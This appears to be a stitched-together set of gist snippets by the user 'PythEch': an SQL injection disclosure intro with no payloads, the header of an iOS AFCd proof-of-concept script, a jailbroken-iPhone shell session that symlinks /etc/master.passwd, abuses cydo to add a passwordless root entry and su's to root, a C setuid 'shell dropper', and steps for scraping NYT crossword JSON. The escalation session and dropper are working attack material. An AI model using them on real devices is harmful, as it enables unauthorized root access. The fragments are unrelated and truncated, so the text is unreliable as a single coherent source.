PythEch

Introduction

This gist includes multiple SQL injection vulnerabilities I found by accident in a bus while travelling. These vulnerabilities are easy to find and easy to exploit, and critical.

Background

I already have Flex legacy paid but, can't buy Flex 2 because of credit card restrictions. Anyway, I decided to give Flex 2 a shot, downloaded the beta from getdelta.co

For fun, I tried to figure out whether spoofing UDID is possible by patching Flex 2 itself. I already knew you have put so much work into DRM. I'm still unsuccessful at this.

PythEch

#! /usr/bin/env python
"""
    PoC of AFCd Vulnerability After Pangu Jailbreak
    Copyright (C) 2014  PythEch

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

PythEch

Hakans-iPhone:/var/tmp mobile$ ln -s /etc/master.passwd
Hakans-iPhone:/var/tmp mobile$ mv master.passwd cydia.log
Hakans-iPhone:/var/tmp mobile$ /usr/libexec/cydia/cydo ":0:0::0:0:System Administrator:/var/root:/bin/sh"
thou shalt not pass
Hakans-iPhone:/var/tmp mobile$ su cydo
Hakans-iPhone:/var/tmp root# cat /etc/master.passwd
##
# User Database
#
# This file is the authoritative user database.

PythEch

Generic shell dropper:

#include <sys/types.h>
#include <unistd.h>

int main(int argc, char **argv, char **envp) {
    setuid(0); 
    execl("/bin/sh", "/bin/sh", 0);
    return 0;
}

PythEch

1. Get https://nyt-games-prd.appspot.com/svc/crosswords/v3/games-hub-puzzles.json
2. Extract results.mini_puzzle.[*].puzzle_id
3. Then head over to https://nyt-games-prd.appspot.com/svc/crosswords/v6/${puzzle_id}.json
4. Parse the data.